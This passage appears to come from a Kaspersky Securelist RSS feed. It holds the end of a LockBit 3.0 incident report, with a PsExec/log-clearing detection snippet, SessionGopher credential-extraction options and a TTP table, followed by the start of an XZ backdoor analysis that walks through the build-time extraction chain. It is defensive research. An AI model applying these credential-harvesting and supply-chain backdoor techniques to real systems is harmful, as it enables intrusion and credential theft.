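                    sources.add(lg["src_ip"])
                    accounts.add(lg["account"])
        log_cleared = any(e["id"] == 1102 for e in evs)
        findings[host] = {
            "psexec_installs": installs,
            "sources": sorted(sources),
            "accounts": sorted(accounts),
            "log_cleared": log_cleared,
            # One source is normal administration; several distinct sources
            # for the same service, or a cleared log, is what the IR team saw.
            "suspicious": len(sources) >= min_sources or log_cleared,
        }
    return findings


if __name__ == "__main__":
    for host, f in correlate(SAMPLE_EVENTS).items():
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{host}: {flag} installs={f['psexec_installs']} "
              f"sources={f['sources']} log_cleared={f['log_cleared']}")
```

<p>Running the block on the constructed sample flags SRV-FILE01 (three sources, log cleared) and leaves WS-HR07 alone. On a real estate the same logic applies to exported System and Security logs; the useful property, noted in the paragraph above, is that the service-creation events are written after the malware's log wipe and therefore survive it.</p>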
  1838. <div id="attachment_112399" style="width: 877px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112399" class="size-full wp-image-112399" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12.png" alt="Event logs cleared" width="867" height="302" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-768x268.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-740x258.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-804x280.png 804w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104427/LockBit_case_12-800x279.png 800w" sizes="(max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-112399" class="wp-caption-text">Event logs cleared</p></div>
  1839. <p>By analyzing some of the traces that were not erased on the initial affected server, we identified compressed Gzip data in a memory stream. The data was encoded in Base64. After decoding and decompression, we found evidence of the use of Cobalt Strike. We were able to identify the C2 server used by the attacker to communicate with the affected machine and promptly sent this indicator to the customer for blacklisting.</p>
  1840. <p>We also spotted the use of the <a href="https://github.com/Arvanaghi/SessionGopher" target="_blank" rel="noopener">SessionGopher</a> script. This tool uses WMI to extract saved session information for remote desktop access tools, such as WinSCP, PuTTY, FileZilla, and Microsoft Remote Desktop. This is accomplished by querying <strong>HKEY_USERS</strong> for PuTTY, WinSCP, and Remote Desktop saved sessions. In <strong>Thorough</strong> mode, the script can identify <strong>.ppk</strong>, <strong>.rdp</strong>, and <strong>.sdtid</strong> files in order to extract private keys and session information. It can be run remotely by using the <strong>-iL</strong> option followed by the list of computers. The <strong>-AllDomain</strong> flag allows running it against all AD-joined computers. As shown in the image below, the script can easily extract saved passwords for remote connections. The results can be exported to a CSV file for later use.</p>
  1841. <div id="attachment_112400" style="width: 604px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112400" class="size-full wp-image-112400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13.png" alt="Password extraction using SessionGopher" width="594" height="688" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13.png 594w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13-259x300.png 259w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13-302x350.png 302w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/12104510/LockBit_case_13-242x280.png 242w" sizes="(max-width: 594px) 100vw, 594px" /></a><p id="caption-attachment-112400" class="wp-caption-text">Password extraction using SessionGopher</p></div>
  1842. <p>Although SessionGopher is designed for collecting stored credentials, it was not the tool used by the attackers for initial credential dumping. Instead, they employed SessionGopher to collect additional credentials and services in the infrastructure at a later stage.</p>
  1843. <p>Once we identified the C2 domains and some other IP addresses related to the attacker and extracted details about the impersonated accounts and tools implemented for automatic deployment, the customer changed all affected users&#8217; credentials and configured security controls to avoid PsExec execution, thus stopping the infection. Monitoring network and user account activities allowed us to identify the infected systems and isolate them for analysis and recovery.</p>
  1844. <p>This case shows an interesting combination of techniques used to gain and maintain access to the target network, as well as encrypt important data and impair defenses. Below are the TTPs identified for this scenario.</p>
  1845. <table width="100%">
  1846. <tbody>
  1847. <tr>
  1848. <td width="35%"><strong>Tactic</strong></td>
  1849. <td width="40%"><strong>Technique</strong></td>
  1850. <td width="25%"><strong>ID</strong></td>
  1851. </tr>
  1852. <tr>
  1853. <td>Impact</td>
  1854. <td>Data Encrypted for Impact</td>
  1855. <td><a href="https://attack.mitre.org/techniques/T1486/" target="_blank" rel="noopener">T1486</a></td>
  1856. </tr>
  1857. <tr>
  1858. <td>Defense Evasion, Persistence, Privilege Escalation, Initial Access</td>
  1859. <td>Valid Accounts</td>
  1860. <td><a href="https://attack.mitre.org/techniques/T1078/002/" target="_blank" rel="noopener">T1078.002</a></td>
  1861. </tr>
  1862. <tr>
  1863. <td>Credential Access</td>
  1864. <td>Credentials from Password Stores</td>
  1865. <td><a href="https://attack.mitre.org/techniques/T1555/" target="_blank" rel="noopener">T1555</a></td>
  1866. </tr>
  1867. <tr>
  1868. <td>Lateral Movement</td>
  1869. <td>Remote Services</td>
  1870. <td><a href="https://attack.mitre.org/techniques/T0886/" target="_blank" rel="noopener">T0886</a></td>
  1871. </tr>
  1872. <tr>
  1873. <td>Discovery</td>
  1874. <td>Network Service Discovery</td>
  1875. <td><a href="https://attack.mitre.org/techniques/T1046/" target="_blank" rel="noopener">T1046</a></td>
  1876. </tr>
  1877. <tr>
1878. <td>Defense Evasion</td>
  1879. <td>Clear Windows Event Logs</td>
  1880. <td><a href="https://attack.mitre.org/techniques/T1070/001/" target="_blank" rel="noopener">T1070.001</a></td>
  1881. </tr>
  1882. <tr>
1883. <td>Defense Evasion</td>
  1884. <td>Impair Defenses</td>
  1885. <td><a href="https://attack.mitre.org/techniques/T1562/" target="_blank" rel="noopener">T1562</a></td>
  1886. </tr>
  1887. </tbody>
  1888. </table>
  1889. <h2 id="preventive-actions-against-ransomware-attacks">Preventive actions against ransomware attacks</h2>
  1890. <p>Ransomware attacks can be devastating, especially if the attackers manage to get hold of high-privileged credentials. Measures for mitigating the risk of such an attack may vary depending on the technology used by the company. However, there are certain infrastructure-agnostic techniques:</p>
  1891. <ul>
  1892. <li>Using a robust, properly-configured antimalware solution, such as <a href="https://www.kaspersky.com/small-to-medium-business-security/endpoint-windows" target="_blank" rel="noopener">Kaspersky Endpoint Security</a></li>
  1893. <li>Implementing <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats</li>
  1894. <li>Disabling unused services and ports to minimize the attack surface</li>
  1895. <li>Keeping all systems and software up to date</li>
  1896. <li>Conducting regular penetration tests and vulnerability scanning to identify vulnerabilities and promptly apply appropriate countermeasures</li>
  1897. <li>Adopting regular cybersecurity training, so that employees are aware of cyberthreats and ways to avoid them</li>
  1898. <li>Making backups frequently and testing them</li>
  1899. </ul>
  1900. <h2 id="conclusion">Conclusion</h2>
  1901. <p>Our examination of the LockBit 3.0 builder files shows the alarming simplicity with which attackers can craft customized ransomware, as evidenced by a recent incident where adversaries exploited administrator credentials to deploy a tailored ransomware variant. This underscores the need for robust security measures capable of mitigating this kind of threat effectively, as well as adoption of a cybersecurity culture among employees.</p>
  1902. <p>Kaspersky products detect the threat with the following verdicts:</p>
  1903. <ul>
  1904. <li>Trojan-Ransom.Win32.Lockbit.gen</li>
  1905. <li>Trojan.Multi.Crypmod.gen</li>
  1906. <li>Trojan-Ransom.Win32.Generic</li>
  1907. </ul>
  1908. <p>And the SessionGopher script, as:</p>
  1909. <ul>
  1910. <li>HackTool.PowerShell.Agent.l</li>
  1911. <li>HackTool.PowerShell.Agent.ad</li>
  1912. </ul>
  1913. ]]></content:encoded>
  1914. <wfw:commentRss>https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/feed/</wfw:commentRss>
  1915. <slash:comments>0</slash:comments>
  1916. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1.jpg" width="1200" height="646"><media:keywords>full</media:keywords></media:content>
  1917. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-1024x551.jpg" width="1024" height="551"><media:keywords>large</media:keywords></media:content>
  1918. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-300x162.jpg" width="300" height="162"><media:keywords>medium</media:keywords></media:content>
  1919. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/14130512/sl-lock-ecnryption-ransomware-blue-1200x646-1-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1920. </item>
  1921. <item>
  1922. <title>XZ backdoor story &#8211; Initial analysis</title>
  1923. <link>https://securelist.com/xz-backdoor-story-part-1/112354/</link>
  1924. <comments>https://securelist.com/xz-backdoor-story-part-1/112354/#comments</comments>
  1925. <dc:creator><![CDATA[GReAT]]></dc:creator>
  1926. <pubDate>Fri, 12 Apr 2024 08:00:34 +0000</pubDate>
  1927. <category><![CDATA[Incidents]]></category>
  1928. <category><![CDATA[Backdoor]]></category>
  1929. <category><![CDATA[Cyber espionage]]></category>
  1930. <category><![CDATA[Linux]]></category>
  1931. <category><![CDATA[Malware]]></category>
  1932. <category><![CDATA[Malware Descriptions]]></category>
  1933. <category><![CDATA[Malware Technologies]]></category>
  1934. <category><![CDATA[SSH]]></category>
  1935. <category><![CDATA[XZ]]></category>
  1936. <category><![CDATA[Unix and macOS malware]]></category>
  1937. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112354</guid>
  1938.  
  1939. <description><![CDATA[Kaspersky analysis of the backdoor recently found in XZ, which is used in many popular Linux distributions and in OpenSSH server process.]]></description>
1940. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>On March 29, 2024, a single <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" target="_blank" rel="noopener">message</a> on the Openwall OSS-security mailing list marked an important moment for the information security, open source and Linux communities: the discovery of a malicious backdoor in <strong>XZ</strong>. <strong>XZ</strong> is a compression utility integrated into many popular distributions of Linux.</p>
  1941. <p>The particular danger of the backdoored library lies in its use by the OpenSSH server process <strong>sshd</strong>. On several systemd-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use systemd features, and as a result has a dependency on this library (note that Arch Linux and Gentoo are unaffected). The ultimate goal of the attackers was most likely to introduce a remote code execution capability to <strong>sshd</strong> that no one else could use.</p>
  1942. <p>Unlike other supply chain attacks we have seen in Node.js, <a href="https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/" target="_blank" rel="noopener">PyPI</a>, <a href="https://social.librem.one/@eighthave/112194828562355097" target="_blank" rel="noopener">FDroid</a>, and the Linux <a href="https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh@linuxfoundation.org/" target="_blank" rel="noopener">Kernel</a> that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that almost succeeded in compromising SSH servers on a global scale.</p>
1943. <p>The backdoor in the liblzma library was introduced at two levels. The source code of the build infrastructure that generated the final packages was slightly modified (by introducing an additional file <strong>build-to-host.m4</strong>) to extract the next stage script that was hidden in a test case file (<strong>bad-3-corrupt_lzma2.xz</strong>). These scripts in turn extracted a malicious binary component from another test case file (<strong>good-large_compressed.lzma</strong>) that was linked with the legitimate library during the compilation process to be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The compromise of XZ Utils is assigned <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3094" target="_blank" rel="noopener">CVE-2024-3094</a> with the maximum severity score of 10.</p>
  1944. <h2 id="the-timeline-of-events">The timeline of events</h2>
  1945. <p>2024.01.19 XZ website moved to GitHub pages by a new maintainer (<a href="https://github.com/JiaT75" target="_blank" rel="noopener">jiaT75</a>)<br />
  1946. 2024.02.15 &#8220;build-to-host.m4&#8221; is <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e" target="_blank" rel="noopener">added</a> to .gitignore<br />
  1947. 2024.02.23 two &#8220;test files&#8221; that contained the stages of the malicious script are <a href="https://git.tukaani.org/?p=xz.git;a=commit;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0" target="_blank" rel="noopener">introduced</a><br />
  1948. <u>2024.02.24 XZ 5.6.0 is released</u><br />
  1949. 2024.02.26 <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7" target="_blank" rel="noopener">commit</a> in CMakeLists.txt that sabotages the <a href="https://man7.org/linux/man-pages/man7/landlock.7.html" target="_blank" rel="noopener">Landlock</a> security feature<br />
  1950. 2024.03.04 the backdoor leads to <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2267598" target="_blank" rel="noopener">issues</a> with Valgrind<br />
  1951. 2024.03.09 two &#8220;test files&#8221; are updated, CRC functions are modified, Valgrind issue is &#8220;fixed&#8221;<br />
  1952. <u>2024.03.09 XZ 5.6.1 is released</u><br />
  1953. 2024.03.28 bug is discovered, Debian and RedHat notified<br />
  1954. 2024.03.28 Debian <a href="https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/" target="_blank" rel="noopener">rolls back</a> XZ 5.6.1 to 5.4.5-0.2 version<br />
  1955. 2024.03.29 an email is <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" target="_blank" rel="noopener">published</a> on the OSS-security mailing list<br />
  1956. 2024.03.29 RedHat confirms backdoored XZ was <a href="https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users" target="_blank" rel="noopener">shipped</a> in Fedora Rawhide and Fedora Linux 40 beta<br />
  1957. 2024.03.30 Debian <a href="https://fulda.social/@Ganneff/112184975950858403" target="_blank" rel="noopener">shuts down</a> builds and starts process to rebuild it<br />
1958. 2024.04.02 XZ main developer <a href="https://tukaani.org/xz-backdoor/" target="_blank" rel="noopener">recognizes</a> the backdoor incident</p>
  1959. <h2 id="backdoored-source-distributions">Backdoored source distributions</h2>
  1960. <p><strong>xz-5.6.0</strong></p>
  1961. <table width="100%">
  1962. <tbody>
  1963. <tr>
  1964. <td width="15%"><strong>MD5</strong></td>
  1965. <td width="85%"><a href="https://opentip.kaspersky.com/c518d573a716b2b2bc2413e6c9b5dbde/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c518d573a716b2b2bc2413e6c9b5dbde</a></td>
  1966. </tr>
  1967. <tr>
  1968. <td><strong>SHA1</strong></td>
  1969. <td>e7bbec6f99b6b06c46420d4b6e5b6daa86948d3b</td>
  1970. </tr>
  1971. <tr>
  1972. <td><strong>SHA256</strong></td>
  1973. <td>0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875</td>
  1974. </tr>
  1975. </tbody>
  1976. </table>
  1977. <p><strong>xz-5.6.1</strong></p>
  1978. <table width="100%">
  1979. <tbody>
  1980. <tr>
  1981. <td width="15%"><strong>MD5</strong></td>
  1982. <td width="85%"><a href="https://opentip.kaspersky.com/5aeddab53ee2cbd694f901a080f84bf1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5aeddab53ee2cbd694f901a080f84bf1</a></td>
  1983. </tr>
  1984. <tr>
  1985. <td><strong>SHA1</strong></td>
  1986. <td>675fd58f48dba5eceaf8bfc259d0ea1aab7ad0a7</td>
  1987. </tr>
  1988. <tr>
  1989. <td><strong>SHA256</strong></td>
  1990. <td>2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8</td>
  1991. </tr>
  1992. </tbody>
  1993. </table>
  1994. <h2 id="initial-infection-analysis">Initial infection analysis</h2>
1995. <p>The XZ git repository contains a set of test files that are used when testing the compressor/decompressor code to verify that it&#8217;s working properly. The account named Jia Tan or &#8220;<a href="https://github.com/JiaT75" target="_blank" rel="noopener">jiaT75</a>&#8221; <a href="https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0" target="_blank" rel="noopener">committed</a> two test files that initially appeared harmless, but served as the bootstrap to implant the backdoor.</p>
  1996. <p>The associated files were:</p>
  1997. <ul>
  1998. <li><strong>bad-3-corrupt_lzma2.xz</strong> (<a href="https://opentip.kaspersky.com/86fc2c94f8fa3938e3261d0b9eb4836be289f8ae/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">86fc2c94f8fa3938e3261d0b9eb4836be289f8ae</a>)</li>
  1999. <li><strong>good-large_compressed.lzma</strong> (<a href="https://opentip.kaspersky.com/540c665dfcd4e5cfba5b72b4787fec4f/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">50941ad9fd99db6fca5debc3c89b3e899a9527d7</a>)</li>
  2000. </ul>
  2001. <p>These files were intended to contain shell scripts and the backdoor binary object itself. However, they were hidden within the malformed data, and the attacker knew how to properly extract them when needed.</p>
  2002. <h3>Stage 1 &#8211; The modified <strong>build-to-host</strong> script</h3>
2003. <p>When an XZ release is ready, the official GitHub repository distributes the project&#8217;s source files. Initially, these releases on the repository, aside from containing the malicious test files, were harmless because the test files never get the chance to execute. However, the attacker appears to have added the malicious code that bootstraps the infection only to the releases sourced from <strong>https://xz[.]tukaani.org</strong>, which was under the control of Jia Tan.</p>
  2004. <p>This URL is used by most distributions, and, when downloaded, it comes with a file named <strong>build-to-host.m4</strong> that contains malicious code.</p>
  2005. <p><strong>build-to-host.m4 </strong>(<a href="https://opentip.kaspersky.com/b4dd2661a7c69e85f19216a6dbbb1664/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c86c8f8a69c07fbec8dd650c6604bf0c9876261f</a>) is executed during the build process and executes a line of code that fixes and decompresses the first file added to the tests folder:</p>
  2006. <div id="attachment_112357" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112357" class="size-large wp-image-112357" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-1024x167.png" alt="Deobfuscated line of code in build-to-host.m4" width="1024" height="167" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-1024x167.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-300x49.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-768x125.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-740x121.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-800x130.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09.png 1246w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112357" class="wp-caption-text">Deobfuscated line of code in build-to-host.m4</p></div>
  2007. <p>This line of code replaces the &#8220;broken&#8221; data from <strong>bad-3-corrupt_lzma2.xz</strong> using the <strong>tr</strong> command, and pipes the output to the <strong>xz -d</strong> command, which decompresses the data. The decompressed data contains a shell script that will be executed later using <strong>/bin/bash</strong>, triggered by this <strong>.m4</strong> file.</p>
  2008. <h3 id="stage-2-the-injected-shell-script">Stage 2 &#8211; The injected shell script</h3>
  2009. <p>The malicious script injected by the malicious <strong>.m4</strong> file verifies that it&#8217;s running on a Linux machine and also that it&#8217;s running inside the intended build process.</p>
  2010. <div id="attachment_112358" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112358" class="size-large wp-image-112358" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1024x229.png" alt="Injected script contents" width="1024" height="229" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1024x229.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-300x67.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-768x171.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1536x343.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1568x350.png 1568w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-740x165.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1255x280.png 1255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-800x179.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112358" class="wp-caption-text">Injected script contents</p></div>
  2011. <p>To execute the next stage, it uses <strong>good-large_compressed.lzma</strong>, which is indeed compressed correctly with XZ, but contains junk data inside the decompressed data.</p>
  2012. <p>The junk data removal procedure is as follows: the <strong>eval</strong> function executes the head pipeline, with each <strong>head</strong> command either ignoring the next 1024 bytes or extracting the next 2048 or 724 bytes.</p>
  2013. <p>In total, these commands extracted <strong>33,492 </strong>bytes (<strong>2048*16 + 724 </strong>bytes). The <strong>tail</strong> command then retains the final <strong>31,265 </strong>bytes of the file and ignores the rest.</p>
2014. <p>Then, the <strong>tr</strong> command applies a basic substitution to the output to deobfuscate it. The second XZ command decompresses the transformed bytes as a raw <strong>lzma </strong>stream, after which the result is piped into a shell.</p>
  2015. <h3 id="stage-3-backdoor-extraction">Stage 3 &#8211; Backdoor extraction</h3>
  2016. <p>The last stage shell script performs many checks to ensure that it is running in the expected environment, such as whether the project is configured to use <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC" target="_blank" rel="noopener">IFUNC</a> (which will be discussed in the next sections).</p>
  2017. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112359" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-1024x83.png" alt="" width="1024" height="83" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-1024x83.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-300x24.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-768x62.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-740x60.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-800x65.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  2018. <p>Many of the other checks performed by this stage include determining whether GCC is used for compilation or if the project contains specific files that will be used by the script later on.</p>
  2019. <p>In this stage, it extracts the backdoor binary code itself, an <a href="https://www.gnu.org/software/guile/manual/html_node/Object-File-Format.html" target="_blank" rel="noopener">object file</a> that is currently hidden in the same <strong>good-large_compressed.lzma</strong> file, but at a different offset.</p>
  2020. <p>The following code handles this:</p>
  2021. <div id="attachment_112360" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112360" class="size-large wp-image-112360" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-1024x160.png" alt="Partial command used by the last script stage" width="1024" height="160" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-1024x160.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-768x120.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-740x115.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-800x125.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12.png 1392w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112360" class="wp-caption-text">Partial command used by the last script stage</p></div>
  2022. <p>The extraction process operates through a sequence of commands, with the result of each command serving as the input for the next one. The formatted one-liner code is shown below:</p>
  2023. <div id="attachment_112361" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112361" class="size-large wp-image-112361" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-1024x742.png" alt="Formatted backdoor extraction one-liner" width="1024" height="742" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-1024x742.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-300x217.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-768x556.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-483x350.png 483w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-740x536.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-387x280.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-800x580.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04.png 1397w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112361" class="wp-caption-text">Formatted backdoor extraction one-liner</p></div>
2024. <p>Initially, the file <strong>good-large_compressed.lzma</strong> is extracted using the <strong>XZ</strong> tool itself. The subsequent steps involve calling a chain of <strong>head</strong> calls with the &#8220;<strong>eval $i</strong>&#8221; function (same as the stage 3 extraction).</p>
  2025. <p>Then a custom RC4-like algorithm is used to decrypt the binary data, which contains another compressed file. This compressed file is also extracted using the XZ utility. The script then removes some bytes from the beginning of the decompressed data using predefined values and saves the result to disk as <strong>liblzma_la-crc64-fast.o</strong>, which is the backdoor file used in the linking process.</p>
  2026. <p>Finally, the script modifies the function <strong>is_arch_extension_supported</strong> from the <strong>crc_x86_clmul.h</strong> file in <strong>liblzma</strong>, to replace the call to the <strong>__get_cpuid</strong> function with <strong>_get_cpuid</strong>, removing one underscore character.</p>
  2027. <p>This modification allows it to be linked into the library (we&#8217;ll discuss this in more detail in the next section). The whole build infection chain can be summarized in the following scheme:</p>
